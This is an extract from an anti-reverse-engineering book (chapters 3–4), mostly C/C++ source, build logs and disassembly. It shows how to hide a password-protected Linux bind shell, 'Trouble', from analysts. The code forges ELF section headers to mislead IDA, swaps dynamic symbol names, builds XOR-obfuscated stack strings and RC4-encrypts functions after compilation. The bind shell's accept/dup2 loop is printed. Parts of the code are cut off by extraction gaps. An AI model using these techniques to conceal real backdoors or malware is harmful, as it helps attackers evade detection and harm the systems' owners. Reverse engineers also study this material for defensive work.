* Edits the ELF header to indicate that there are 4 section headers and that
* the string table is the last one.
*
* \param[in,out] p_data the ELF binary
* \return true if its possible to add a section table. false otherwise
*/
bool edit_elf_header(std::string& p_data)
{
if (p_data[0] != 0x7f || p_data[1] != 'E' || p_data[2] != 'L' ||
p_data[3] != 'F')
{
return false;
}
if (ehdr->e_shoff != 0)
{
std::cerr << "The binary already has a section table." << std::endl;
return false;
}
if (ehdr->e_shentsize != sizeof(Elf64_Shdr))
{
std::cerr << "Unexpected section header size" << std::endl;
return false;
}
ehdr->e_shoff = p_data.size();
ehdr->e_shnum = 4;
ehdr->e_shstrndx = 3;
return true;
}
/*
* Finds the PF_X LOAD segment and creates a corresponding section header. The
* base address is modified to throw off any disassembler that relies on the
* section header only.
*
* \param[in,out] p_data the ELF binary
* \param[in,out] p_strings the section table string names
Chapter 3: File Format Hacks 111
/*
* This finds the PF_W segment and creates a matching section header named .data
*
* \param[in,out] p_data the ELF binary
* \param[in,out] p_strings the section table string names
Chapter 3: File Format Hacks 112
/**
* Creates a fake sections table and appends the strings to the end of the file.
*
* \param[in,out] p_data the ELF binary
* \return true on success and false otherwise
*/
bool append_sections(std::string& p_data)
{
Chapter 3: File Format Hacks 113
if (!add_data_section(p_data, strings))
{
std::cerr << "Failed to find the executable LOAD segment" << std::endl;
return false;
}
if (!add_text_section(p_data, strings))
{
std::cerr << "Failed to find the writable LOAD segment" << std::endl;
return false;
}
// .shstrtab
Elf64_Shdr strtab = {};
strtab.sh_name = strings.size();
strtab.sh_type = SHT_STRTAB;
strtab.sh_flags = 0;
strtab.sh_addr = 0;
strtab.sh_offset = p_data.size() + sizeof(Elf64_Shdr);
strtab.sh_size = 0;
strtab.sh_link = 0;
strtab.sh_info = 0;
strtab.sh_addralign = 4;
strtab.sh_entsize = 0;
strings.append(".shstrtab");
strings.push_back('\x00');
strtab.sh_size = strings.size();
p_data.append(reinterpret_cast<char*>(&strtab), sizeof(strtab));
p_data.append(strings);
return true;
}
if (p_argc != 2)
{
std::cerr << "Usage: ./fakeHeadersHideEntry <file path>" << std::endl;
return EXIT_FAILURE;
}
if (!edit_elf_header(input))
{
return EXIT_FAILURE;
}
if (!append_sections(input))
{
return EXIT_FAILURE;
}
outputFile.write(input.data(), input.length());
outputFile.close();
return EXIT_SUCCESS;
}
Compiling fakeHeadersHideEntry
albino-lobster@ubuntu:~/antire_book$ cd chap_3_format_hacks/fakeHeadersHideEntry/
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/fakeHeadersHideEntry$ mkdir b\
uild
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/fakeHeadersHideEntry$ cd buil\
d/
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/fakeHeadersHideEntry/build$ c\
make ..
-- The CXX compiler identification is GNU 5.4.0
-- Check for working CXX compiler: /usr/bin/c++
-- Check for working CXX compiler: /usr/bin/c++ -- works
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Configuring done
-- Generating done
-- Build files have been written to: /home/albino-lobster/antire_book/chap_3_format_h\
acks/fakeHeadersHideEntry/build
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/fakeHeadersHideEntry/build$ m\
ake
Scanning dependencies of target fakeHeadersHideEntry
[ 50%] Building CXX object CMakeFiles/fakeHeadersHideEntry.dir/src/fakeHeadersHideEnt\
ry.cpp.o
[100%] Linking CXX executable fakeHeadersHideEntry
[100%] Built target fakeHeadersHideEntry
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/fakeHeadersHideEntry/build$
Recompile Trouble and remove the section headers table using stripBinary. Next use
fakeHeadersHideEntry to append the fake section headers table.
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/fakeHeadersHideEntry/build$ .\
/fakeHeadersHideEntry ~/antire_book/chap_3_format_hacks/trouble/build/trouble
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/fakeHeadersHideEntry/build$
The output isnt exciting but the result is interesting. First lets look at Trouble in
Radare2.
Chapter 3: File Format Hacks 116
9 sections
[0x004002f2]>
Chapter 3: File Format Hacks 117
This obfuscation technique has no affect on Radare2. This further confirms that
Radare2 prefers the information in the program headers even when the section
headers are present. Lets contrast that against IDA. Here is IDAs disassembly of
the entry point.
You can see that Hopper, like Radare2, also disassembles the entry point correctly. It
appears that this trick is only useful against IDA, but it is still a useful tool to keep
in our toolbox.
chap_3_format_hacks/mixDynamicSymbols/CMakeLists.txt
project(mixDynamicSymbols CXX)
cmake_minimum_required(VERSION 3.0)
chap_3_format_hacks/mixDynamicSymbols/src/mixDynamicSymbols.cpp
#include <cstdlib>
#include <iostream>
#include <fstream>
#include <iomanip>
#include <cstring>
#include <elf.h>
#include <vector>
/*
* This tool takes in an ELF binary that has a sections table and uses dynamic
* linkage and attachs a fake dynamic symbol table at the end of the binary.
* Then the symbol names in the fake symbol table are mixed. This will cause
* disassemblers that place too much trust in the sections table, like IDA,
* to display the wrong symbol name in the disassembly.
*/
/*
* Finds the SHT_DYNSYM in the sections table, points the offset to the end
* of the binary, and copies the existing dynsym to the end of the file. Then
* loops over the symbols in the new dynsym and changes all the name offsets
* around
*
* \param[in,out] p_data the ELF binary we are modifying
* \return truee if we didn't encounter and error and false otherwise
*/
bool append_dynsym(std::string& p_data)
{
if (p_data[0] != 0x7f || p_data[1] != 'E' || p_data[2] != 'L' ||
p_data[3] != 'F')
{
std::cerr << "Bad magic." << std::endl;
Chapter 3: File Format Hacks 120
return false;
}
if (ehdr->e_shentsize != sizeof(Elf64_Shdr))
{
std::cerr << "Unexpected section header size" << std::endl;
return false;
}
symbols.push_back(symbol);
}
}
return true;
}
}
std::cerr << "Never found the dynamic symbol table" << std::endl;
return false;
}
if (!append_dynsym(input))
{
Chapter 3: File Format Hacks 122
return EXIT_FAILURE;
}
outputFile.write(input.data(), input.length());
outputFile.close();
return EXIT_SUCCESS;
}
Compiling mixDynamicSymbols
albino-lobster@ubuntu:~/antire_book$ cd chap_3_format_hacks/mixDynamicSymbols/
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/mixDynamicSymbols$ mkdir build
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/mixDynamicSymbols$ cd build/
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/mixDynamicSymbols/build$ cmak\
e ..
-- The CXX compiler identification is GNU 5.4.0
-- Check for working CXX compiler: /usr/bin/c++
-- Check for working CXX compiler: /usr/bin/c++ -- works
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Configuring done
-- Generating done
-- Build files have been written to: /home/albino-lobster/antire_book/chap_3_format_h\
acks/mixDynamicSymbols/build
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/mixDynamicSymbols/build$ make
Scanning dependencies of target mixDynamicSymbols
[ 50%] Building CXX object CMakeFiles/mixDynamicSymbols.dir/src/mixDynamicSymbols.cpp\
.o
[100%] Linking CXX executable mixDynamicSymbols
[100%] Built target mixDynamicSymbols
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/mixDynamicSymbols/build$
Chapter 3: File Format Hacks 123
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 5] .dynsym DYNSYM 0000000000400300 00000300
0000000000000348 0000000000000018 A 6 1 8
Importantly, note that the offset is 0x300. Also, its worthwhile to look at the dynamic
symbol table to see how thats going to change.
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/mixDynamicSymbols/build$ ./mi\
xDynamicSymbols ~/antire_book/chap_1_introduction/trouble/build/trouble
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/mixDynamicSymbols/build$
No fancy output on success, but take a look at the .dynsym section header now.
Chapter 3: File Format Hacks 125
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 5] .dynsym DYNSYM 0000000000400300 00004540
0000000000000348 0000000000000018 A 6 1 8
Instead of pointing at 0x300 the offset now points at the fake symbol table we copied
to 0x4540. Lets look at how the dynamic symbol table has changed.
Look at symbol number two. Before mixDynamicSymbols the symbol name was
accept@GLIBC_2.4 (2) but now it reads memcp@GLIBC_2.4 (2). How does this
affect the disassembly? Check out the function check_password() in IDA.
Notice how the call at 0x400c23 says _bind? That should be memcmp. The subtlety of
this technique should not be underrated. A reverse engineer is only going to notice
the symbol name is incorrect if they come across it while doing dynamic analysis
or if they compare the .dynsym offsets in the section headers and program headers.
Unfortunately, once again, Radare2 is immune to this obfuscation technique.
Interestingly, while Hopper has correctly handled some of the other file format
obfuscations it does fall victim this particular attack.
check_password:
0000000000400c06 push rbp ; XREF=main+404
0000000000400c07 mov rbp, rsp
0000000000400c0a sub rsp, 0x10
0000000000400c0e mov qword [ss:rbp+var_8], rdi
0000000000400c12 mov rax, qword [ss:rbp+var_8]
0000000000400c16 mov edx, 0x20 ; argument "address_len" for method j_bind
0000000000400c1b mov rsi, rax ; argument "address" for method j_bind
0000000000400c1e mov edi, 0x400f00 ; "GisfUtI89aMRKJvkz31NuXtq9155kEGa", argum\
ent "socket" for method j_bind
0000000000400c23 call j_bind
0000000000400c28 test eax, eax
0000000000400c2a setne al
0000000000400c2d leave
0000000000400c2e ret
; endp
Chapter 4: Fighting Off String
Analysis
In the previous chapters a lot of work has gone into preventing a reverse engineer
from figuring out the password to the Trouble bind shell. Yet, we havent protected
the binary from one of the first tools in a reverse engineers toolbox: strings. Check
out how easy it is to uncover the password:
Code Reorganization
Now that youve made it to chapter four its time to change how Trouble is compiled.
Youve learned a handful of interesting obfuscation techniques and I want to keep
using some of those techniques on/off throughout the remainder of the book. In the
previous chapter, you kept having to manually run stripBinary, but that is kind of
annoying to have to do everytime. Instead, lets automate it. In chapter four, youll
compile Trouble by using the CMakeLists.txt file in the directory dontpanic. Later,
youll see how you can easily add and execute other projects to dontpanic by
running cmake ..; make once. For now, here is what compiling Trouble in chapter
four should look like:
Strings is a simple utility that outputs all the strings in a provided file. For a full write up see man strings.
Chapter 4: Fighting Off String Analysis 130
albino-lobster@ubuntu:~/antire_book$ cd chap_4_static_analysis/dontpanic/
albino-lobster@ubuntu:~/antire_book/chap_4_static_analysis/dontpanic$ mkdir build
albino-lobster@ubuntu:~/antire_book/chap_4_static_analysis/dontpanic$ cd build/
albino-lobster@ubuntu:~/antire_book/chap_4_static_analysis/dontpanic/build$ cmake ..
-- The C compiler identification is GNU 5.4.0
-- Check for working C compiler: /usr/bin/cc
-- Check for working C compiler: /usr/bin/cc -- works
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Detecting C compile features
-- Detecting C compile features - done
-- Configuring done
-- Generating done
-- Build files have been written to: /home/albino-lobster/antire_book/chap_4_static_a\
nalysis/dontpanic/build
albino-lobster@ubuntu:~/antire_book/chap_4_static_analysis/dontpanic/build$ make
Scanning dependencies of target trouble
[ 33%] Building C object trouble/CMakeFiles/trouble.dir/src/trouble.c.o
[ 66%] Building C object trouble/CMakeFiles/trouble.dir/src/rc4.c.o
[100%] Linking C executable trouble
The bind shell password is: CyrHgAtdD6QfwbS0oso17M5WMOWygWMn
[100%] Built target trouble
albino-lobster@ubuntu:~/antire_book/chap_4_static_analysis/dontpanic/build$
Not only do all of the projects get compiled, but stripBinary and fakeHeadersXBit
get applied to Trouble automatically. The bind shell can now be found in the build
directory in the trouble subdirectory.
Stack Strings
One of the the ways to hide strings is to mix the construction of the string with code.
This is the basic idea behind a stack string. The goal is to add each byte of the string
onto the stack one at a time. For example, consider the string /bin/sh in Trouble.
Currently, the string is used with execve like so:
Chapter 4: Fighting Off String Analysis 131
albino-lobster@ubuntu:~/antire_book/chap_4_static_analysis/dontpanic/build$ strings -\
a ./trouble/trouble | grep "/bin/sh"
/bin/sh
You can make simple change to ensure that the /bin/sh string is built on the stack
and wont appear in the strings output.
albino-lobster@ubuntu:~/antire_book/chap_4_static_analysis/dontpanic/build$ strings -\
a ./trouble/trouble | grep "/bin/sh"
albino-lobster@ubuntu:~/antire_book/chap_4_static_analysis/dontpanic/build$
Why does this work? Consider the disassembly around execve() before the stack
string change:
Chapter 4: Fighting Off String Analysis 132
As you can plainly see the address for the string /bin/sh is stored in edi before the
call to execve(). However, check out the stack strings version.
Above you can see that each letter (0x2f, 0x62, 0x69, 0x63, 0x2f, 0x73, 0x68, and NULL)
are moved onto the stack one byte at a time. This effectively mixes the string with
the code so that tools like strings cant easily find them.
FLOSS
In 2016 FireEye released an open source tool called FireEye Labs Obfus-
cated String Solved or FLOSS. Among other things, FLOSS is supposed
to find stack strings. However, FLOSS doesnt fully support ELF binaries
and therefore cant seem to find the stack strings in Trouble. Linux gets
no love, huh?
Chapter 4: Fighting Off String Analysis 133
Implementing a stack string as an array of individual chars is pretty useful, but how
can we make that work for Troubles shell password? Remember that you generate
a new shell password whenever the command cmake is run and the generated
password is passed into Trouble as a macro. The macro is just a string. That means
we should be able to index into it as normal and let the compiler clean up the rest.
For example, you can change the check_password() function to look like this:
The resulting disassembly is larger, but keeps strings from seeing the password.
sword+DB j
.text:00000000004004D2 call __stack_chk_fail
.text:00000000004004D2 check_password endp
Finally, just to verify that our stack string code actually worked, check out the strings
output.
albino-lobster@ubuntu:~/antire_book/chap_4_static_analysis/dontpanic/build$ strings -\
a -n 32 ./trouble/trouble
Resource temporarily unavailable
Address family not supported by protocol
Cannot send after socket shutdown
}&*+<=>?CGJMXYZ[\]^_`acdefgijklrstyz{|
since each characters hex representation is visible in the disassembly. Lets go one
step further and XOR each byte so that the reverse engineer cant just read the values
straight from the disassembly.
Before you add in the new XOR logic consider if you had one hundred of these
strings that needed to be obfuscated. It isnt really reasonable to write them out as
arrays every single time is it? Lets use macros to automate this. What is a macro
exactly? GCCs documentation calls it a fragment of code which has been given a
name. For our purposes, you can consider macros to be a simple find and replace
mechanism. Before you compile the preprocessor will find all calls to the macros and
replace them with the actual code defined in the macro. Understand that this is an
oversimplification but its enough to understand the basics.
I would love to present you with a beautiful recursive macro that prettily creates the
stack string. Reality isnt always as beautiful as wed like. Recursive macros arent
possible in C (or C++ for that matter). Therefore, youre forced to create a new macro
for each index in the string. Luckily, Ive written it for you.
chap_4_static_analysis/dontpanic/trouble/src/xor_string.h
/**
* The macros below can be used to generate a stack string that has been
* obfuscated by a given "key" (ie 0xaa). The macros are listed from 0-31.
* The length of the string is the number in the macro name. For example, if I
* have an 8 byte string I want to obfuscate then I'd use XOR_STRING7. Why 7?
* Because the macros start at 0.
*/
https://gcc.gnu.org/onlinedocs/gcc-5.1.0/cpp/Macros.html
Chapter 4: Fighting Off String Analysis 137
/** This function deobfuscates the string. It isn't a macro because we don't
* want to do this at compile time. We want to do it at run time.
*
* \param[in,out] p_string the string to deobfuscate
* \param[in] p_length the length of the string
* \param[in] p_key the "key" to deobfuscate with
*
* \note p_string will be deobfuscated. So if you call this function with
* p_string *a second time* then it will get reobfuscated.
*/
char* undo_xor_string(char* string, int length, char key)
{
for (int i = 0; i < length; i++)
{
string[i] = string[i] ^ key;
}
return string;
}
Im sure you are thinking, Boy, that sure is ugly. Couldnt we just use a for loop?.
Maybe something like this:
Alas, no. Remember that a macro is basically a placeholder for the defined code
fragment. Calling XOR_STRING31 will result in 32 lines of code replacing XOR_-
STRING31. XOR_FOR_REAL would result in three lines of replacement code. A for
Chapter 4: Fighting Off String Analysis 139
loop will not reliably generate a stack string (ie. the stack string would be present
in the strings output). Therefore, we are stuck with the many macros solution.
Now you can rewrite check_password() to use one of the XOR_STRING macros.
#include "xor_string.h"
Note that I was careful with my wording here because it is theoretically possible for the loop to get unrolled by the
optimizer and that might generate a stack string. However, that cant be relied upon and Im not even truly certain if its
possible.
Chapter 4: Fighting Off String Analysis 140
That is harder to pull the password out of (especially when you dont know the key).
As a reverse engineer, if you ever come across XOR encoded data there are two well
known tools for finding and decoding the data.
However, note that youve already defeated these tools simply by using XOR in
conjunction with a stack string.
Function Encryption
Generating XOR obfuscated stack strings is pretty handy, but it wont slow down
a good reverse engineer. You need something more powerful to hide the bind shell
password. Lets try encrypting the entire check_password() function.
https://blog.didierstevens.com/programs/xorsearch/
https://github.com/hellman/xortool
Chapter 4: Fighting Off String Analysis 142
void a_function()
{
}
void b_function()
{
}
void c_function()
{
int a_function_length = b_function - a_function();
}
This method makes the assumption that, when compiled, b_function() will imme-
diately follow a_function(). This might work. It might not. It totally depends on
what the compiler has decided to do with your code. A fool proof way of finding
a functions size is to use a linker script. The linker script describes how sections
are mapped in the binary. Normally, you dont worry about the linker script because
the linker uses an internal script. You can see the default internal script by passing
the verbose option to the linker (note that the following output is truncated because
it goes on for a while).
https://sourceware.org/binutils/docs/ld/Scripts.html#Scripts
Chapter 4: Fighting Off String Analysis 143
However, you can provide the linker with your own script to complement or replace
the default script. For example, the following script will create a symbol called
check_password_size that will contain the length of the section named .check_pass-
word.
Chapter 4: Fighting Off String Analysis 144
chap_4_static_analysis/dontpanic/trouble/trouble_layout.lds
SECTIONS
{
check_password_size = SIZEOF(.check_password);
}
If you recompile Trouble and dont strip the sections table, you can confirm that a
special section .check_password section was created.
https://gcc.gnu.org/onlinedocs/gcc/Common-Function-Attributes.html#Common-Function-Attributes
Chapter 4: Fighting Off String Analysis 145
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .init PROGBITS 0000000000400120 00000120
0000000000000003 0000000000000000 AX 0 0 1
[ 2] .text PROGBITS 0000000000400130 00000130
000000000000173f 0000000000000000 AX 0 0 16
[ 3] .check_password PROGBITS 0000000000401870 00001870
0000000000000107 0000000000000000 AX 0 0 16
[ 4] .fini PROGBITS 0000000000401977 00001977
0000000000000003 0000000000000000 AX 0 0 1
[ 5] .rodata PROGBITS 0000000000401980 00001980
0000000000000858 0000000000000000 A 0 0 64
[ 6] .eh_frame PROGBITS 00000000004021d8 000021d8
0000000000000004 0000000000000000 A 0 0 4
[ 7] .init_array INIT_ARRAY 0000000000602fe8 00002fe8
0000000000000008 0000000000000000 WA 0 0 8
[ 8] .fini_array FINI_ARRAY 0000000000602ff0 00002ff0
0000000000000008 0000000000000000 WA 0 0 8
[ 9] .jcr PROGBITS 0000000000602ff8 00002ff8
0000000000000008 0000000000000000 WA 0 0 8
[10] .data PROGBITS 0000000000603000 00003000
0000000000000160 0000000000000000 WA 0 0 64
[11] .bss NOBITS 0000000000603180 00003160
0000000000000320 0000000000000000 WA 0 0 64
[12] .shstrtab STRTAB 0000000000000000 00003160
0000000000000067 0000000000000000 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), l (large)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
Great! Now you need to add a definition for check_password_size so that Trouble
knows the size of the check_password() function at run time. You can add this line
Chapter 4: Fighting Off String Analysis 146
If you recompile and look for check_password_size in the symbol table you wont
find it. The reason is that you havent added the logic to use the linker script yet.
Unfortunately, this is one of the few places that CMake has fails us. There is no way
to actually pass a script to the linker in CMake. I was forced to hack it in. Troubles
CMakeList.txt should be updated to look like this:
# This will create a 32 byte "password" for the bind shell. This command
# is only run when "cmake" is run, so if you want to generate a new password
# then "cmake ..; make" should be run from the command line.
exec_program("/bin/sh"
${CMAKE_CURRENT_SOURCE_DIR}
ARGS "-c 'cat /dev/urandom | tr -dc a-zA-Z0-9 | head -c 32'"
OUTPUT_VARIABLE random_password )
set(CMAKE_C_COMPILER musl-gcc)
set(CMAKE_C_FLAGS "-Wall -Wextra -Wshadow -O3 -funroll-loops -fno-asynchronous-unwind\
-tables -static -std=gnu11")
add_executable(${PROJECT_NAME} src/trouble.c)
add_custom_target(addLDS
COMMAND sed -i -e 's,-o,${CMAKE_CURRENT_SOURCE_DIR}/trouble_layout.\
lds -o,g' ./CMakeFiles/trouble.dir/link.txt)
add_dependencies(${PROJECT_NAME} addLDS)
# After the build is successful, display the random password to the user
add_custom_command(TARGET ${PROJECT_NAME} POST_BUILD
COMMAND ${CMAKE_COMMAND} -E echo
"The bind shell password is:" ${random_password})
Chapter 4: Fighting Off String Analysis 147
The imporant part that was added is the addLDS logic. This uses the sed utility to
insert the new linker script into the linker options deep within CMakes generated
files. You can verify that this actually works by recompiling Trouble and looking for
check_password_size in the symbol table.
albino-lobster@ubuntu:~/antire_book/chap_4_static_analysis/dontpanic/build$ readelf -\
s ./trouble/trouble | grep size
96: 0000000000000107 0 NOTYPE GLOBAL DEFAULT ABS check_password_size
Both the sections headers table and the symbol say that the check_password() is 0x107
bytes long. That sounds about right. Lets move on.
Decryption Logic
Youll start off by adding the decryption logic to Trouble. First youll need to add
in the crypto. Youll be using a popular open source implementation of RC4 that is
licensed under the simplified BSD license.
chap_4_static_analysis/dontpanic/trouble/src/rc.h
/*
* rc4.h
*
* Copyright (c) 1996-2000 Whistle Communications, Inc.
* All rights reserved.
*
* Subject to the following obligations and disclaimer of warranty, use and
* redistribution of this software, in source or object code forms, with or
* without modifications are expressly permitted by Whistle Communications;
* provided, however, that:
* 1. Any and all reproductions of the source or object code must include the
* copyright notice above and the following disclaimer of warranties; and
* 2. No rights are granted, in any manner or form, to use Whistle
* Communications, Inc. trademarks, including the mark "WHISTLE
* COMMUNICATIONS" on advertising, endorsements, or otherwise except as
* such appears in the above copyright notice or in the software.
*
Chapter 4: Fighting Off String Analysis 148
#ifndef _SYS_CRYPTO_RC4_RC4_H_
#define _SYS_CRYPTO_RC4_RC4_H_
#include <stdint.h>
struct rc4_state
{
uint8_t perm[256];
uint8_t index1;
uint8_t index2;
};
extern void rc4_init(struct rc4_state *state, const uint8_t *key, int keylen);
extern void rc4_crypt(struct rc4_state *state, const uint8_t *inbuf, uint8_t *outbuf,\
int buflen);
#endif
Chapter 4: Fighting Off String Analysis 149
chap_4_static_analysis/dontpanic/trouble/src/rc4.c
/*
* rc4.c
*
* Copyright (c) 1996-2000 Whistle Communications, Inc.
* All rights reserved.
*
* Subject to the following obligations and disclaimer of warranty, use and
* redistribution of this software, in source or object code forms, with or
* without modifications are expressly permitted by Whistle Communications;
* provided, however, that:
* 1. Any and all reproductions of the source or object code must include the
* copyright notice above and the following disclaimer of warranties; and
* 2. No rights are granted, in any manner or form, to use Whistle
* Communications, Inc. trademarks, including the mark "WHISTLE
* COMMUNICATIONS" on advertising, endorsements, or otherwise except as
* such appears in the above copyright notice or in the software.
*
* THIS SOFTWARE IS BEING PROVIDED BY WHISTLE COMMUNICATIONS "AS IS", AND
* TO THE MAXIMUM EXTENT PERMITTED BY LAW, WHISTLE COMMUNICATIONS MAKES NO
* REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED, REGARDING THIS SOFTWARE,
* INCLUDING WITHOUT LIMITATION, ANY AND ALL IMPLIED WARRANTIES OF
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT.
* WHISTLE COMMUNICATIONS DOES NOT WARRANT, GUARANTEE, OR MAKE ANY
* REPRESENTATIONS REGARDING THE USE OF, OR THE RESULTS OF THE USE OF THIS
* SOFTWARE IN TERMS OF ITS CORRECTNESS, ACCURACY, RELIABILITY OR OTHERWISE.
* IN NO EVENT SHALL WHISTLE COMMUNICATIONS BE LIABLE FOR ANY DAMAGES
* RESULTING FROM OR ARISING OUT OF ANY USE OF THIS SOFTWARE, INCLUDING
* WITHOUT LIMITATION, ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
* PUNITIVE, OR CONSEQUENTIAL DAMAGES, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES, LOSS OF USE, DATA OR PROFITS, HOWEVER CAUSED AND UNDER ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
* THIS SOFTWARE, EVEN IF WHISTLE COMMUNICATIONS IS ADVISED OF THE POSSIBILITY
* OF SUCH DAMAGE.
*
* $FreeBSD: src/sys/crypto/rc4/rc4.c,v 1.2.2.1 2000/04/18 04:48:31 archie Exp $
*/
#include "rc4.h"
#include <sys/types.h>
Chapter 4: Fighting Off String Analysis 150
temp = *a;
*a = *b;
*b = temp;
}
/*
* Initialize an RC4 state buffer using the supplied key,
* which can have arbitrary length.
*/
void
rc4_init(struct rc4_state *const state, const uint8_t *key, int keylen)
{
uint8_t j;
int i;
/*
* Encrypt some data using the supplied RC4 state buffer.
* The input and output buffers may be the same buffer.
* Since RC4 is a stream cypher, this function is used
* for both encryption and decryption.
*/
void
rc4_crypt(struct rc4_state *const state,
const uint8_t *inbuf, uint8_t *outbuf, int buflen)
{
Chapter 4: Fighting Off String Analysis 151
int i;
uint8_t j;
/* Modify permutation */
swap_bytes(&state->perm[state->index1],
&state->perm[state->index2]);
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include "rc4.h"
Chapter 4: Fighting Off String Analysis 152
#include "xor_string.h"
/**
* This implements a fairly simple bind shell. The server first requires a
* password before allowing access to the shell. The password is currently
* randomly generated each time 'cmake ..' is run. The server has no shutdown
* mechanism so it will run until killed.
*/
int main(int p_argc, char* p_argv[])
{
(void)p_argc;
(void)p_argv;
while (true)
{
int client_sock = accept(sock, NULL, NULL);
if (client_sock < 0)
{
perror("Accept call failed");
return EXIT_FAILURE;
}
if (check_password(password_input))
{
close(client_sock);
return EXIT_FAILURE;
}
dup2(client_sock, 0);
dup2(client_sock, 1);
dup2(client_sock, 2);
close(client_sock);
}
}
This section will contain the key that check_password() has been encrypted with.
Encryption Logic
Youve added the RC4 decryption logic to Trouble. Now you need to add RC4
encryption logic. You wont encrypt check_password() until after Trouble has been
compiled. Ive written a tool called encryptFunctions that takes in an ELF binary
and encrypts the functions. You can find the tool in the chapter four directory. The
tool works by looking for a section that starts with .rc4. It will then match the
Chapter 4: Fighting Off String Analysis 155
.rc4 section with a section to encrypt. For example, the sections you added to
Trouble: .rc4_check_password and .check_password. The tool will store a randomly
generated key in the .rc4_check_password section and RC4 encrypt the .check_pass-
word section. The encryptFunctions project is made up of four files: CMakeLists.txt,
encryptFunctions.cpp, rc4.c, and rc4.h (note that the rc4 files were listed earlier in
this chapter).
chap_4_static_analysis/dontpanic/encryptFunctions/CMakeLists.txt
project(encryptFunctions CXX)
cmake_minimum_required(VERSION 2.6)
chap_4_static_analysis/dontpanic/encryptFunctions/src/encryptFunctions.cpp
#include <cstdlib>
#include <iostream>
#include <fstream>
#include <iomanip>
#include <cstring>
#include <random>
#include <elf.h>
#include <map>
#include "rc4.h"
/**
* This tool will search through a binaries section table and look for
* specially named section. Specifically, any section whose name that starts
* with ".rc4_*" will be marked as a location to store a 128 byte key and the
* section named by the "*" in ".rc4_*" will be encrypted using rc4.
*/
/**
* This function finds the special ".rc4_" section, generates a key, and
* encrypts the specified section.
Chapter 4: Fighting Off String Analysis 156
*
* \param[in,out] p_data the ELF binary
* \return true on success and false otherwise
*/
bool encrypt_functions(std::string& p_data)
{
if (p_data[0] != 0x7f || p_data[1] != 'E' || p_data[2] != 'L' || p_data[3] != 'F')
{
return false;
}
return true;
}
if (!encrypt_functions(input))
Chapter 4: Fighting Off String Analysis 158
{
std::cerr << "Failed to complete the encryption function" << std::endl;
return EXIT_FAILURE;
}
outputFile.write(input.data(), input.length());
outputFile.close();
return EXIT_SUCCESS;
}
In order to use encryptFunctions, youll need to update the CMakeLists.txt in the base
dontpanic directory. It should look like this.
project(dontpanic C)
cmake_minimum_required(VERSION 3.0)
add_subdirectory(encryptFunctions)
add_subdirectory(trouble)
project(trouble C)
cmake_minimum_required(VERSION 3.0)
# This will create a 32 byte "password" for the bind shell. This command
# is only run when "cmake" is run, so if you want to generate a new password
# then "cmake ..; make" should be run from the command line.
exec_program("/bin/sh"
${CMAKE_CURRENT_SOURCE_DIR}
ARGS "-c 'cat /dev/urandom | tr -dc a-zA-Z0-9 | head -c 32'"
OUTPUT_VARIABLE random_password )
set(CMAKE_C_COMPILER musl-gcc)
set(CMAKE_C_FLAGS "-Wall -Wextra -Wshadow -O3 -static -std=gnu11")
add_executable(${PROJECT_NAME} src/trouble.c src/rc4.c)
add_custom_target(addLDS
COMMAND sed -i -e 's,-o,${CMAKE_CURRENT_SOURCE_DIR}/trouble_layout.\
lds -o,g' ./CMakeFiles/trouble.dir/link.txt)
add_dependencies(${PROJECT_NAME} addLDS)
# After the build is successful, display the random password to the user
add_custom_command(TARGET ${PROJECT_NAME} POST_BUILD
COMMAND ${CMAKE_COMMAND} -E echo
"The bind shell password is:" ${random_password})
add_custom_command(TARGET ${PROJECT_NAME}
POST_BUILD
COMMAND ../encryptFunctions/encryptFunctions ${CMAKE_CURRENT_BINAR\
Y_DIR}/${PROJECT_NAME})
Finally! You can recompile Trouble. There should be extra output associated with the
encryption of check_password().
Chapter 4: Fighting Off String Analysis 160
albino-lobster@ubuntu:~/antire_book/chap_4_static_analysis/dontpanic/build$ make
-- Configuring done
-- Generating done
-- Build files have been written to: /home/albino-lobster/antire_book/chap_4_static_a\
nalysis/dontpanic/build
[ 20%] Built target stripBinary
[ 40%] Built target fakeHeadersXBit
Scanning dependencies of target encryptFunctions
[ 50%] Building CXX object encryptFunctions/CMakeFiles/encryptFunctions.dir/src/encry\
ptFunctions.cpp.o
[ 60%] Building CXX object encryptFunctions/CMakeFiles/encryptFunctions.dir/src/rc4.c\
.o
[ 70%] Linking CXX executable encryptFunctions
[ 70%] Built target encryptFunctions
[ 70%] Built target addLDS
Scanning dependencies of target trouble
